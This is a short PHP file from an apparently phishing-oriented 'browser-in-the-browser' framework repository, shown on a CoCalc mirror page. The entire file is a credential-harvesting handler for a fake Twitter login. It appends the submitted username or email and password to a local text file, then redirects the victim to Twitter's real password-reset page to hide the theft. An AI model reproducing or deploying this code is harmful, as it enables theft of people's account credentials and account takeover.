Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
surya-dev-singh
GitHub Repository: surya-dev-singh/bitb-framwork
Path: blob/main/sites/twitter/login.php
1050 views
1
<?php
2
3
file_put_contents("../userpass/usernames.txt", "Twitter Username: " . $_POST['usernameOrEmail'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
4
header('Location: https://twitter.com/account/begin_password_reset');
5
exit();
6
?>
7